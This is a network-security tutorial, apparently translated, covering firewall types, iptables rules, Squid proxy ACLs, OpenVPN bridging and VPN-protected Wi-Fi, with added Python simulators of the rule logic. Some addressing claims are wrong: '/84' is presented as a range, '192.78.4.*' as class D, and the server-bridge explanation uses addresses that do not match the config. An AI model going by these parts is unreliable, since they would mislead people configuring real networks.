A Firewall can also extract data at Layers 6 and 7 of the packet: file type, URL, content, service, application, user, and so on.

d. Types of Firewall
By placement:
- Network Firewall: protects an entire network.
- Host Firewall: protects the single computer it is installed on (usually built into the OS or into security software such as Anti-Virus or Endpoint Security).
- Web Firewall: either a Network Firewall or a Host Firewall whose job is to protect a web service against attacks.
By hardware and software platform:
- Software Firewall: usually installed on an OS, or a Linux distribution with a built-in software firewall.
- Hardware Firewall: optimized by building the operating system on the vendor's own hardware platform, giving better processing performance.
By packet-processing capability:
- Packet Filter: works at Layers 3 and 4 of the OSI model. It filters packets at these two layers; a Firewall of this kind can be regarded as an Access Control List on a Router.


- Application Filter: works at Layer 7. Rules can be written on Layer 7 attributes of the OSI model such as URL and content.
- Stateful Filter: works from Layer 3 to Layer 7. Complex rules can be built from IP, port, URL, file type, time, user, content, header, and so on.
- UTM: integrates a Firewall with the other UTM functions. Because of the number of features, processing performance is not high.
Gartner (the organization that evaluates IT solutions) has defined a new concept for a new generation of Firewall. A Next Generation Firewall must have the following features:
- Inline operation in the network (it can operate transparently from Layer 2).
- The basic Firewall features: Packet Filter, NAT, stateful inspection, VPN.
- Network discovery (active hosts, services, applications, OS, vulnerabilities).
- Deeply integrated IPS (configuration, rule editing, Event Impact Flags).
- Application Awareness: detects the applications on the network and allows deep policies such as blocking Skype or Yahoo Messenger.
- Extra-firewall Intelligence: for example, blocking one particular user from logging in to Facebook while the remaining users can still get through.
- Continuous signature updates so that the system stays protected.

Gartner introduced this Firewall concept and it is the feature set of today's firewalls, yet many books I have seen have still not included it, even though many of these systems are deployed in practice.

e. Firewall design in the network model
Designing a firewall that fits the network is very important. Below I present some firewall deployment models:

Router acting as a Packet Filter


Firewall applied to the DMZ zone

Integrated network model at one organization (example)


Another example of a network model integrating Firewalls. This model contains: a Firewall, a dedicated BlueCoat Proxy, a Sourcefire IPS, load balancing across several Internet links, a UTM Firewall, and many other security devices and solutions.


6. Configuring the IPtables firewall on Linux
Unix/Linux systems have many Firewalls. Among them is one that is configured and operated from the console, very small and handy: Iptables. This article does not intend to cover Iptables usage in detail, but I hope that through it you will understand and be able to configure Iptables at a basic level.
First you need to understand how the Iptables Firewall handles packets leaving, entering or passing through the PC:
- Any Packet that wants to enter your PC has to pass through the Input Chain.
- Any Packet from your PC that wants to go out to the Network has to pass through the Output Chain.


- Any Packet that your PC forwards to another Destination has to pass through the Forward Chain.
All of the above is supervised by Iptables, and of course Iptables has to be installed and set up :-) Configuring the Input Chain, Output Chain and Forward Chain is called setting the rules for the Firewall. Iptables is built into the kernel of most common Linux versions today: Redhat, Mandrake, SuSe. If not, you can find Iptables at:
http://www.linuxapps.com/
http://www.freshmeat.net/

Some simple configurations

Some common Ports and Services on a Unix/Linux system:

Port    Protocol    Service
21      TCP         FTP
22      TCP         SSH
23      TCP         TELNET
25      TCP         SMTP
53      TCP         NAME (DNS)
79      TCP         FINGER
80      TCP         HTTP
110     TCP         POP3
111     TCP         SUNRPC
443     TCP         HTTPS
901     TCP         SAMBA-SWAT
1024    TCP         KDM
3306    TCP         MYSQL
6000    TCP         X11

Now let us look at the basic functions and configuration of Iptables. Example: when your PC sends a Packet to http://www.yahoo.com/ to request an HTML page, it first has to pass through the Output Chain. At this point the rules come into play and check the Send Packet request; if the request is valid, the Packet is let through.


Next, when Yahoo's reply Packet comes back to your machine it also has to pass through the Input Chain, and of course it must match the Rules before it is allowed into your machine. As troublesome and complicated as customs at Noi Bai Airport, isn't it?
Let us start by working with specific IP addresses. Suppose you want to block all Packets coming from 192.78.4.0. -s is the option that names a source IP address or DNS name to block, which gives the command line:
iptables -A INPUT -s 192.78.4.0
If you want to handle the Packets more precisely, the -j option lets you say what to do with them: ACCEPT, DENY or DROP (used together with the -s option). I probably do not need to explain what the three words ACCEPT, DENY and DROP mean. To DROP the Packets from address 192.78.4.0:
iptables -A INPUT -s 192.78.4.0 -j DROP
DENY and ACCEPT work the same way ;-p The single command above discards everything coming from 192.78.4.0.
We can also ignore one particular PC on a network. If you do not want the PCs in the network to communicate with a given PC, or to communicate with the outside, you only need to change the Input/Output parameter and the -s and -d options.
Suppose we want to ignore Telnet requests from this PC. In this case at least three protocols can be specified: TCP, UDP and ICMP. The -p option is used to specify the protocol to handle. Telnet is a protocol that runs on Port 23/TCP, so we get the command line:
iptables -A INPUT -s 192.78.4.0 -p tcp --dport telnet -j DROP
The Commands above operate on a single IP address. If you want to operate on many IP addresses at once, there is a small change:
- 192.78.4.0/84 ==> all the IPs from 192.78.4.0 up to 192.78.4.84


- 192.78.4.* ==> all the IPs in the class-D range, from 192.78.4.0 up to 192.78.4.255

A slightly more complex configuration (only slightly)
You have a LAN and an Internet connection. Let us agree that the LAN is eth0 and the Internet connection is ppp0. You want to allow the Telnet service to run on the PCs inside the LAN but not to be reachable from the Internet (for safety reasons). Don't worry, Iptables takes care of this for you: you can use the -i and -o options. Blocking on the Output Chain turns out to be more reasonable than blocking on the Input Chain. You can add the -i option:
iptables -A INPUT -p tcp --destination-port telnet -i ppp0 -j DROP
The Command above blocks all Telnet requests, and the risk of Telnet attacks, from the outside into your LAN.
If you know which Protocols the Packets use, and if it is TCP, you can easily tell which Port it uses. When two PCs connect over TCP the connection has to be initiated first; that is the job of a SYN packet. A SYN Packet tells the other PC that it is ready to connect, and only one PC needs to send it. If you block incoming SYN packets, you stop other PCs from reaching the Services that are Open, which means you isolate the PCs in your LAN from PCs on the Internet:
iptables -A INPUT -i ppp0 -p tcp --syn -j DROP
If you still want to keep one Service but do not want PCs on the Internet to talk to it, only PCs on the LAN, you can block SYN Packets selectively by that Service's Port:
iptables -A INPUT -i ppp0 -p tcp --syn ! --destination-port 80 -j DROP
By default the Input Chain and Output Chain are configured in Accept mode, while Forward is always set to Deny mode. If you want to use the Server and Firewall as a Router, you must set Forward to Accept.
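As an added example (not part of this article), here is a Python simulation of how Iptables walks a chain: rules are tried in order, the first match with a target decides, and the chain policy applies when nothing matches. It accepts the command lines used above (service names from the port table for --dport, CIDR prefixes between 0 and 32 as iptables requires, and the ! negation placed before the option it negates) and runs the LAN/Internet scenario above against constructed packets. It models the matching logic only and is not a substitute for the kernel.

```python
import ipaddress
import shlex
from dataclasses import dataclass

# Service names from the port table above, so --dport telnet resolves like /etc/services.
SERVICES = {"ftp": 21, "ssh": 22, "telnet": 23, "smtp": 25, "domain": 53,
            "finger": 79, "http": 80, "pop3": 110, "https": 443, "mysql": 3306}


@dataclass
class Packet:
    chain: str                 # INPUT, OUTPUT or FORWARD
    src: str
    dst: str
    proto: str = "tcp"
    dport: int = 0
    syn: bool = False          # TCP with SYN set and ACK clear: a new connection
    in_if: str = ""
    out_if: str = ""


class Firewall:
    def __init__(self):
        self.policy = {"INPUT": "ACCEPT", "OUTPUT": "ACCEPT", "FORWARD": "ACCEPT"}
        self.chains = {"INPUT": [], "OUTPUT": [], "FORWARD": []}

    def run(self, cmdline):
        """Accept an 'iptables -A CHAIN ... [-j TARGET]' or 'iptables -P CHAIN POLICY' line."""
        argv = shlex.split(cmdline)
        if argv[:2] == ["iptables", "-P"]:
            self.policy[argv[2]] = argv[3]
            return
        if argv[:2] != ["iptables", "-A"]:
            raise ValueError("only -A and -P are modelled: " + cmdline)
        chain, matches, target, negate, i = argv[2], [], None, False, 3
        while i < len(argv):
            opt = argv[i]
            if opt == "!":                       # applies to the next option only
                negate, i = True, i + 1
                continue
            if opt == "--syn":
                matches.append(("syn", True, negate)); i += 1
            elif opt == "-j":
                target = argv[i + 1]; i += 2
            else:
                val = argv[i + 1]
                if opt == "-s":
                    matches.append(("src", ipaddress.ip_network(val, strict=False), negate))
                elif opt == "-d":
                    matches.append(("dst", ipaddress.ip_network(val, strict=False), negate))
                elif opt == "-p":
                    matches.append(("proto", val.lower(), negate))
                elif opt in ("--dport", "--destination-port"):
                    matches.append(("dport", int(SERVICES.get(val, val)), negate))
                elif opt == "-i":
                    matches.append(("in_if", val, negate))
                elif opt == "-o":
                    matches.append(("out_if", val, negate))
                else:
                    raise ValueError("unsupported option " + opt)
                i += 2
            negate = False
        self.chains[chain].append((matches, target))

    @staticmethod
    def _match(matches, pkt):
        for field, want, negate in matches:
            if field in ("src", "dst"):
                hit = ipaddress.ip_address(getattr(pkt, field)) in want
            elif field == "syn":
                hit = pkt.proto == "tcp" and pkt.syn
            else:
                hit = getattr(pkt, field) == want
            if hit == negate:                    # a negated match must NOT hit
                return False
        return True

    def verdict(self, pkt):
        """First matching rule with a target decides; otherwise the chain policy."""
        for matches, target in self.chains[pkt.chain]:
            if target is not None and self._match(matches, pkt):
                return target
        return self.policy[pkt.chain]


def lan_firewall():
    """The LAN (eth0) / Internet (ppp0) scenario above, as iptables command lines."""
    fw = Firewall()
    for cmd in [
        "iptables -P FORWARD DROP",
        "iptables -A INPUT -s 192.78.4.0 -p tcp --dport telnet -j DROP",
        "iptables -A INPUT -p tcp --destination-port telnet -i ppp0 -j DROP",
        "iptables -A INPUT -i ppp0 -p tcp --syn ! --destination-port 80 -j DROP",
    ]:
        fw.run(cmd)
    return fw


if __name__ == "__main__":
    fw = lan_firewall()
    print(fw.verdict(Packet("INPUT", "10.0.0.9", "192.168.1.1", dport=22, syn=True, in_if="ppp0")))  # DROP
    print(fw.verdict(Packet("INPUT", "10.0.0.9", "192.168.1.1", dport=80, syn=True, in_if="ppp0")))  # ACCEPT
```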


There are many excellent Rule-configuration Scripts for Iptables on the Internet; you can download them and apply them directly on your system. There are also some tools for configuring Iptables under X.

Closing words
Security is always a complex topic that consumes a lot of ink. I hope that through this article you understand and can use Iptables. Everything is only relative, so if you want to keep your system safe you must keep reviewing and testing the Firewall, the Bugs, and always stay on the highest alert...

7. Installing and configuring SQUID as a Proxy Server

a. Linux SQUID Proxy Server
Squid is a proxy server. Its strengths are saving bandwidth, improving security and speeding up web access for users, and it has become one of the best-known proxies. There are many proxy-server programs on the market today, but they have two drawbacks: first, you have to pay to use them, and second, most do not support ICP (ICP is used to propagate changes to the content of the URLs already held in the cache, the store of web pages you have visited). Squid is the best choice for a proxy-cache server: it meets both of our requirements, being free to use and supporting ICP. Squid provides advanced caching for web clients and supports the common services FTP, Gopher and HTTP. Squid keeps the most recent information from these services in RAM, manages a large database of that information on disk, has a sophisticated access-control mechanism, and supports the SSL protocol for secure connections through the proxy. Furthermore, squid can cooperate with the caches of other proxy servers to store web pages efficiently. Below we go through how to install a Proxy server.

b. Installation
First, we should have some idea of the hardware requirements of a proxy server:


*** Hard-disk access speed: very important, because squid constantly reads and writes data on disk. A SCSI disk with a high data-transfer rate is a good candidate for this job.
*** Disk space for the cache depends on the size of the network Squid serves: 1 to 2 GB for an average network of about 100 machines. This is only an illustrative figure, however, since actual Internet usage is what decides how much disk is needed.
*** RAM: very important; with little RAM Squid is noticeably slower.
*** CPU: does not need to be very powerful; around 133 MHz can run fine at a load of 7 requests/second.
Installing Squid on RedHat Linux is very simple. Squid is installed if you select it during the initial installation. If you installed Linux without Squid, you can install it later with the rpm utility:
rpm -i squid_package_name
Squid is then installed and you can move on to configuring it. Squid's default directories:
/usr/sbin
/etc/squid
/var/log/squid
Installing from source:
+ With the squid source file squid-version.tar.gz, run the following commands:
tar xzvf squid-version.tar.gz
cd squid-version


./configure
make
make install
After running the commands above, squid is installed.

c. Configuring Squid
- Once squid is installed, we have to configure it for our particular needs. We set a few parameters in the file /etc/squid/squid.conf as follows:
** http_port: default 3128.
** icp_port: default 3130.
** cache_dir: declares the cache directory and its size for squid; the default is:
cache_dir ufs /var/spool/squid/cache 100 16 256
The value 100 means 100 MB is used as cache; if the hard disk is large, we can raise it depending on disk size. So squid stores its cache in the directory /var/spool/squid/cache with a cache size of 100 MB.
** Access Control Lists and Access Control Operators: these two features can be used to block and restrict access based on destination domain or on the IP address of a host or network. By default squid refuses to serve everyone, so this parameter has to be reconfigured. To do so, we configure it to suit our needs with two parameters: acl and http_access. Example: we allow only the network 172.16.1.0/24 to use the proxy server, using the src keyword in the acl:
acl MyNetwork src 172.16.1.0/255.255.255.0
http_access allow MyNetwork


http_access deny all
+ We can also forbid hosts from reaching sites that are not allowed, with the dstdomain keyword in the acl, for example:
acl BadDomain dstdomain yahoo.com
http_access deny BadDomain
http_access deny all
+ If the list of forbidden sites is too long, we can keep it in a text file containing the list of addresses:
acl BadDomain dstdomain "/etc/squid/danhsachcam"
http_access deny BadDomain
+ In the configuration above, /etc/squid/danhsachcam is a text file holding the addresses that may not be accessed, one per line.
+ We can have several acls, and each acl must have a matching http_access, as follows:
acl MyNetwork src 172.16.1.0/255.255.255.0
acl BadDomain dstdomain yahoo.com
http_access deny BadDomain
http_access allow MyNetwork
http_access deny all
+ The configuration above shows the proxy forbidding hosts from reaching the site www.yahoo.com and allowing only the network 172.16.1.0/24 to use the proxy. http_access deny all: deny everything except the acls already declared.
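The acl/http_access pairs above are evaluated in order, and two details of Squid's rules are easy to get wrong: a dstdomain without a leading dot matches only that exact host name (so yahoo.com on its own does not catch www.yahoo.com, while .yahoo.com catches the domain and every subdomain), and when no http_access line matches at all, Squid applies the opposite of the last line's action. The added Python evaluator below (not part of this document) models this for src and dstdomain acls; the file-backed list is supplied as an in-memory dict so that it runs offline.

```python
import ipaddress


class SquidAccess:
    """Evaluates squid.conf 'acl' and 'http_access' lines for src and dstdomain acls."""

    def __init__(self, config, files=None):
        self.files = files or {}          # path -> file text, stands in for reading the disk
        self.acls = {"all": [("src", ipaddress.ip_network("0.0.0.0/0"))]}
        self.rules = []                   # [(action, [(negated, aclname), ...]), ...]
        for line in config.splitlines():
            parts = line.split("#", 1)[0].split()
            if not parts:
                continue
            if parts[0] == "acl":
                self._add_acl(parts[1], parts[2], parts[3:])
            elif parts[0] == "http_access":
                names = [(n.startswith("!"), n.lstrip("!")) for n in parts[2:]]
                self.rules.append((parts[1], names))

    def _add_acl(self, name, kind, values):
        if kind not in ("src", "dstdomain"):
            raise ValueError("only src and dstdomain acls are modelled: " + kind)
        expanded = []
        for v in values:
            if v.startswith('"') and v.endswith('"'):      # "/path/to/file": one entry per line
                expanded += self.files[v.strip('"')].split()
            else:
                expanded.append(v)
        entries = self.acls.setdefault(name, [])
        for v in expanded:
            if kind == "src":                              # accepts a.b.c.d/n or a.b.c.d/netmask
                entries.append(("src", ipaddress.ip_network(v, strict=False)))
            else:
                entries.append(("dstdomain", v.lower()))

    @staticmethod
    def _domain_hit(pattern, host):
        if pattern.startswith("."):        # .example.com: the domain and every subdomain
            return host == pattern[1:] or host.endswith(pattern)
        return host == pattern             # example.com: exactly that host only

    def _acl_hit(self, name, client_ip, host):
        for kind, value in self.acls[name]:
            if kind == "src" and ipaddress.ip_address(client_ip) in value:
                return True
            if kind == "dstdomain" and self._domain_hit(value, host.lower()):
                return True
        return False

    def decide(self, client_ip, host):
        """Return 'allow' or 'deny' as Squid would for a request to host from client_ip."""
        for action, names in self.rules:
            if all(self._acl_hit(n, client_ip, host) != neg for neg, n in names):
                return action
        if not self.rules:                 # no http_access lines at all: Squid denies
            return "deny"
        last = self.rules[-1][0]           # nothing matched: opposite of the last line
        return "deny" if last == "allow" else "allow"


# Constructed sample built from the configuration above, plus a file-backed list.
CONFIG = """\
acl MyNetwork src 172.16.1.0/255.255.255.0
acl BadDomain dstdomain yahoo.com
acl BadList dstdomain "/etc/squid/danhsachcam"
http_access deny BadDomain
http_access deny BadList
http_access allow MyNetwork
http_access deny all
"""
FILES = {"/etc/squid/danhsachcam": ".badsite.test\nblocked.example\n"}
PROXY = SquidAccess(CONFIG, FILES)

if __name__ == "__main__":
    print(PROXY.decide("172.16.1.10", "yahoo.com"))       # deny
    print(PROXY.decide("172.16.1.10", "www.yahoo.com"))   # allow: no leading dot, exact host only
    print(PROXY.decide("10.0.0.1", "example.org"))        # deny: outside MyNetwork
```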


If the proxy cannot connect directly to the Internet and has no public IP address, or sits behind a Firewall, we have to make it query another proxy that can reach the Internet, with the following parameter:
cache_peer ITdep.hcmutrans.edu.vn parent 8080 8082

+ The configuration above makes the proxy query the parent proxy ITdep.hcmutrans.edu.vn, declared with the parent parameter, on http_port 8080 and icp_port 8082. In addition, if there are several proxy servers on the same network, we can let them query each other like this:
cache_peer proxy2.hcmutrans.edu.vn sibling 8080 8082
cache_peer proxy3.hcmutrans.edu.vn sibling 8080 8082
sibling is used for proxies that are peers of one another.

d. Starting Squid
After installing and configuring squid, we must create the cache before running squid, with the command:
squid -z
If cache creation fails, check the permissions on the cache directory declared in the cache_dir parameter: the directory may not be writable. If so, change it with:
chown squid:squid /var/spool/squid
chmod 770 /var/spool/squid
Once the cache directory is created, we start and stop squid with the script as follows:
/etc/init.d/squid start
/etc/init.d/squid stop


After squid starts, to monitor and manage client access, or to see what squid is doing and how it is caching, we regularly look at the following files:
*** cache_log: contains warnings and status information about the cache
*** store_log: contains the database of what has just been updated in the cache and what has expired
*** access_log: contains all the information about client access, including source address, destination and time

That completes the Server side. On the client side, you have to adjust the configuration with the Server's address and the Server's proxy port, for example as in the following figure:


8. Deploying a VPN on OpenVPN

a. Overview of OpenVPN
OpenVPN is an open-source tool used to build site-to-site virtual private networks (between the branches of a company) with the SSL/TLS protocol or with pre-shared secret keys (PSK). Its role is to secure a data tunnel over a single TCP/UDP port across an insecure network such as the Internet, which is why a virtual private network is needed. OpenVPN can be installed on almost any platform, including Linux, Windows 2000/XP/Vista, OpenBSD, FreeBSD, NetBSD, Mac OS X and Solaris. Linux systems need kernel 2.4 or later. The configuration principles are the same on every platform.
OpenVPN is based on a client/server architecture. It must be installed on the VPN members, which are designated as servers or clients. OpenVPN creates a TCP or UDP tunnel and then encrypts the data inside the tunnel. OpenVPN's default port number is UDP 1194, a port assigned by the Internet Assigned Numbers Authority (IANA). From release 2.0 you can use either TCP or UDP, and a single port can be used for several tunnels on an OpenVPN server.
You can choose to build either an Ethernet (Bridged) or an IP (Routed) VPN, using the TAP or TUN network driver respectively. TAP/TUN is available on all platforms and ships with Linux kernel 2.4 or later. The OpenVPN options are particularly important; for example, the server can push network routes to the client, or can be used as a DHCP server.
When static keys are used, the two VPN endpoints share the same key to encrypt and decrypt data. In that case the configuration is simple, but the problem is that you have to deliver the key (over a secure channel) to someone at the other end of the tunnel whom you do not necessarily trust.


Public Key Infrastructure (PKI) is used to solve this problem. It rests on each party owning two keys: a public key known to everyone and a private key kept secret. This process is used by OpenSSL, the free, open-source implementation of SSL integrated into OpenVPN, to authenticate the VPN peers before data encryption begins. Let us look at the advantages of the two modes:

OpenVPN mode               Pre-shared keys    SSL
Cipher mode                Symmetric          Asymmetric
Implementation             Easy               Difficult
Speed                      Fast               Slow
CPU usage                  Low                High
Key exchange               Yes                No
Encryption key renewal     No                 Yes
Peer authentication        No                 Yes

b. Deploying OpenVPN with SSL on Ubuntu Linux
OpenVPN uses a Public Key Infrastructure (PKI) to encrypt the VPN traffic between nodes. A simple way to set up a VPN with OpenVPN is to connect the clients through a bridge interface on the VPN server. This guide assumes that one VPN node, the server in this case, has a bridge interface configured.

Step 1: Install OpenVPN.
To install OpenVPN, enter in the ubuntu terminal:
sudo apt-get install openvpn


Step 2: Deployment model
VPN deployment model: Server-PT acts as the VPN server and Client PC-PT plays the VPN client, connecting to the Server over the Internet. The VPN Server runs Ubuntu Server; the Client runs Ubuntu Desktop.

Step 3: Set up the Server Certificates

After installing OpenVPN, we create the certificates for the VPN server. First, copy the easy-rsa directory to /etc/openvpn. This ensures that any changes to the scripts are not lost when the package is updated. You will also need to adjust the permissions on the easy-rsa directory so that the current user can create files there. From the terminal enter:

sudo mkdir /etc/openvpn/easy-rsa/
sudo cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* /etc/openvpn/easy-rsa/
sudo chown -R $USER /etc/openvpn/easy-rsa/


Next, edit /etc/openvpn/easy-rsa/vars with your own information:
export KEY_COUNTRY="VN"
export KEY_PROVINCE="NC"
export KEY_CITY="HANOI"
export KEY_ORG="NETPRO-ITI"
export KEY_EMAIL="chiennv@netpro.edu.vn"

Enter the following to create the server certificates (pkitool --initca creates the CA, which must exist before the server key can be signed; ./build-ca and ./build-key-server server are the interactive equivalents of the two pkitool commands):

cd /etc/openvpn/easy-rsa/
source vars
./clean-all
./pkitool --initca
./pkitool --server server
./build-dh
cd keys
openvpn --genkey --secret ta.key
sudo cp server.crt server.key ca.crt dh1024.pem ta.key /etc/openvpn/


Step 4: Set up the client certificates
Each VPN Client also needs a certificate to authenticate itself to the server. To create it, enter the following in the terminal:
cd /etc/openvpn/easy-rsa/
source vars
./pkitool hostname
Replace hostname with the actual name of the machine that will connect to the VPN.
Copy the following files to the Client:
/etc/openvpn/ca.crt
/etc/openvpn/easy-rsa/keys/hostname.crt
/etc/openvpn/easy-rsa/keys/hostname.key
/etc/openvpn/ta.key

Remember to adjust the file names to the Client's hostname. It is best to use a secure method to copy the certificates and keys. The SCP utility is a good choice, but copying the files to the Client by conventional means can also work.

Step 5: Configure the server
Now configure the OpenVPN server by creating /etc/openvpn/server.conf from the example file. In the terminal enter:
sudo cp /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz /etc/openvpn/
sudo gzip -d /etc/openvpn/server.conf.gz
Edit /etc/openvpn/server.conf to match the configuration below:
local 192.168.78.128


dev tap0
# the ca file (ca.crt) must be placed in /etc/openvpn/; the cert and key files likewise
up "/etc/openvpn/up.sh br0"
down "/etc/openvpn/down.sh br0"
;server 10.8.0.0 255.255.255.0
server-bridge 192.168.78.128 255.255.255.0 192.168.78.50 192.168.78.100
push "route 192.168.78.128 255.255.255.0"
push "dhcp-option DNS 192.168.78.128"
;push "dhcp-option DOMAIN netpro.edu.vn"
tls-auth ta.key 0 # This file is secret
user nobody
group nogroup
log-append openvpn.log
verb 2

local: the IP address of the bridge interface. server-bridge: required when the configuration uses a bridge; 172.18.100.101 255.255.255.0 is the bridge interface and its mask, and the IP range 172.18.100.105 172.18.100.200 is the range of IP addresses handed out to clients. push: the directive that adds network routes for the Client. user and group: the user and group under which the OpenVPN daemon runs.


Replace all the IP addresses and domain names above with those of your network.
Next, create a few scripts to add the tap interface to the bridge. Create /etc/openvpn/up.sh:
#!/bin/sh
BR=$1
DEV=$2
MTU=$3
/sbin/ifconfig $DEV mtu $MTU promisc up
/usr/sbin/brctl addif $BR $DEV
And /etc/openvpn/down.sh:
#!/bin/sh
BR=$1
DEV=$2
/usr/sbin/brctl delif $BR $DEV
/sbin/ifconfig $DEV down
Then set the permissions:
sudo chmod 755 /etc/openvpn/down.sh
sudo chmod 755 /etc/openvpn/up.sh
With the server configured, restart OpenVPN by entering:
sudo /etc/init.d/openvpn restart

Step 6: Configure the client.


First install OpenVPN on the Client:
sudo apt-get install openvpn
Then, with the server configuration and the client certificates copied into /etc/openvpn/, create a client configuration file by copying the example. In the client's terminal enter:
sudo cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn
Edit /etc/openvpn/client.conf to match:
dev tap
remote 192.168.78.128 1194
cert hostname.crt
key hostname.key
tls-auth ta.key 1
Replace vpn.example.com with the hostname of your VPN server, and hostname.* with the actual certificate and key file names. Finally restart OpenVPN:
sudo /etc/init.d/openvpn restart
You can now connect to the remote LAN over the VPN.
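As an added check (not part of this document), the Python function below parses the server.conf and client.conf fragments shown above and reports the mismatches that typically stop a bridged tunnel from coming up: different dev types, different proto or port, tls-auth key-direction values that are not complementary (server 0, client 1), a server-bridge pool outside the bridge subnet, and a server that does not drop privileges. The two configurations are constructed from the values above, with the ca/cert/key lines that the example files carry.

```python
import ipaddress


def parse_ovpn(text):
    """Turn an OpenVPN config into {option: [args...]}; ';' and '#' start comments."""
    opts = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split()
        opts[parts[0]] = parts[1:]
    return opts


def check_pair(server_text, client_text):
    """Return a list of findings for a server/client pair; an empty list means consistent."""
    s, c = parse_ovpn(server_text), parse_ovpn(client_text)
    findings = []

    # 1. Both ends must use the same virtual device type (tap = bridged, tun = routed).
    s_dev = s.get("dev", ["?"])[0].rstrip("0123456789")
    c_dev = c.get("dev", ["?"])[0].rstrip("0123456789")
    if s_dev != c_dev:
        findings.append(f"dev mismatch: server {s_dev}, client {c_dev}")

    # 2. Transport and port: 'remote host [port [proto]]' on the client; defaults udp/1194.
    s_proto = s.get("proto", ["udp"])[0].rstrip("46")      # tolerate udp4/udp6 spellings
    s_port = s.get("port", ["1194"])[0]
    remote = c.get("remote", [])
    c_port = remote[1] if len(remote) > 1 else "1194"
    c_proto = remote[2] if len(remote) > 2 else c.get("proto", ["udp"])[0].rstrip("46")
    if s_port != c_port:
        findings.append(f"port mismatch: server {s_port}, client {c_port}")
    if s_proto != c_proto:
        findings.append(f"proto mismatch: server {s_proto}, client {c_proto}")

    # 3. tls-auth on both sides, with key-direction 0 on one end and 1 on the other.
    s_ta, c_ta = s.get("tls-auth"), c.get("tls-auth")
    if bool(s_ta) != bool(c_ta):
        findings.append("tls-auth configured on only one side")
    elif s_ta and c_ta:
        dirs = {s_ta[1] if len(s_ta) > 1 else None, c_ta[1] if len(c_ta) > 1 else None}
        if dirs != {"0", "1"}:
            findings.append(f"tls-auth key-direction not complementary: {sorted(map(str, dirs))}")

    # 4. server-bridge gateway netmask pool-start pool-end: the pool must lie in the subnet.
    sb = s.get("server-bridge")
    if sb and len(sb) == 4:
        subnet = ipaddress.ip_network(f"{sb[0]}/{sb[1]}", strict=False)
        if not all(ipaddress.ip_address(a) in subnet for a in sb[2:]):
            findings.append(f"server-bridge pool {sb[2]}-{sb[3]} outside {subnet}")
    elif s_dev == "tap" and not sb:
        findings.append("dev tap on the server but no server-bridge line")

    # 5. Privilege drop on the server and credentials on the client.
    if "user" not in s or "group" not in s:
        findings.append("server does not drop privileges (user/group missing)")
    for opt in ("ca", "cert", "key"):
        if opt not in c:
            findings.append(f"client is missing '{opt}'")
    return findings


# Constructed from the server.conf and client.conf values above.
SERVER_CONF = """\
local 192.168.78.128
dev tap0
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
;server 10.8.0.0 255.255.255.0
server-bridge 192.168.78.128 255.255.255.0 192.168.78.50 192.168.78.100
push "route 192.168.78.128 255.255.255.0"
tls-auth ta.key 0 # This file is secret
user nobody
group nogroup
"""
CLIENT_CONF = """\
client
dev tap
remote 192.168.78.128 1194
ca ca.crt
cert hostname.crt
key hostname.key
tls-auth ta.key 1
"""

if __name__ == "__main__":
    print(check_pair(SERVER_CONF, CLIENT_CONF))                                   # []
    print(check_pair(SERVER_CONF, CLIENT_CONF.replace("tls-auth ta.key 1", "tls-auth ta.key 0")))
```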


9. Using a VPN to protect a Wi-Fi system

a. Wi-Fi security methods
In this part I present a security solution for the Wi-Fi service. Wi-Fi networks are very widely used today, yet many people do not fully understand the security holes that exist in a Wi-Fi network. This article introduces the use of VPN technology to secure a Wi-Fi network.
The security features built into an Access Point:
- Not broadcasting the SSID
Hiding the SSID may deter a few curious people with little knowledge of Wireless networks, and such people are often not dangerous anyway. However, the SSID must be carried in every frame of the wireless network, and neither the SSID nor the MAC address is encrypted when transmitted, so any Wireless attack tool can discover networks that do not broadcast their SSID.
- MAC Address Filter
A feature configured on the Access Point that allows only certain MAC addresses to connect to it. This solution looks fine, but unfortunately there are many tools that capture Wireless frames; since MAC addresses and SSIDs are not encrypted in any frame, an attacker easily discovers which MAC addresses are allowed on the Access Point, and there are also many Tools for spoofing a MAC address.
- WEP
This encryption method uses a shared key between the device and the Access Point, but unfortunately many Tools can decrypt its frames and recover the Key.
- WPA
This looks secure, but unfortunately the latest Wireless cracking tools, such as Aircrack, support attacks on Wireless networks that use this encryption protocol.
So are we helpless?
- Today the only Wireless security solution that can be trusted is to use a VPN.
- The VPN deployment model for an Access Point is shown in the figure below:


b. Configuring the Access Point and the VPN Server 2003

- Configure the Access Point
- Enable the VPN feature on the Windows Server 2003 server
- Create VPN connections from the Wireless client devices (Laptops).
- I use a Linksys Access Point.
- The device has 1 Internet Port and 4 LAN Ports.
- Plug the cable from the Switch into the Internet Port; the 4 LAN Ports are not needed.
- With that done I log in to the Access Point to start configuring it. After logging in to the Access Point through the Web interface I configure its IP addresses.
- I set the Internet Port of the Access Point to 192.168.50.33, with the parameters shown in the figure below.
- I set the Gateway IP address for the Wi-Fi devices to 192.168.1.1
- The IP addresses assigned to devices connecting to the Access Point come from the range 192.168.1.0/24
- With that done I configure the Security feature for the Wi-Fi connections


Security configuration:
- Choose Security Mode: WPA2 Personal
- Choose the encryption algorithm for the WPA protocol: TKIP+AES
- The Key that devices must supply to connect to this Wireless network: vnexperts.net


- My SSID is VNEXPERTS.NET

After saving all the settings, I go to a computer and connect it over Wi-Fi to this Access Point.


- Using the built-in Windows tool to search for Wireless SSIDs, I see a network with the SSID VNEXPERTS.NET; press Connect, type the key set above, and the Wireless connection is complete.
- But after connecting you certainly still cannot reach the Internet.

Entering the access Key


Connection completed

Configuration on the Windows Server 2003 server


In the previous part of this article I explained in detail how to turn a Windows Server 2003 machine into a VPN Server, through these basic steps:
- Set the IP addresses of the server's two network cards
- Enable the Routing and Remote Access feature
- Create a User and a Group that is allowed VPN access
- Create a Remote Access Policy that permits VPN connections
- Assign virtual IP addresses to the VPN connections.

Set the IP addresses of the server's two network cards as below, following the first figure of this article:
- The card facing the Internet gets a Gateway
- The card facing the Internal network needs no Gateway

Enable the Routing and Remote Access feature: Start it, press Next, and in the next window choose Custom Configuration as in the figure below. When the system asks whether to start this Service, press Yes and the process is complete.

Create a user and a group permitted to use VPN
- My server is a Domain Controller (this is not required; on a server that is not a DC you create the user and group in the same way). Here I create a user named vnexperts.net with the password 123456. A password like this is acceptable only in a lab: every client that has joined the Wi-Fi can reach the VPN server and try to log in, so a real VPN account needs a strong password and, ideally, account lockout.

- Open the Dial-in tab and verify the setting shown below.
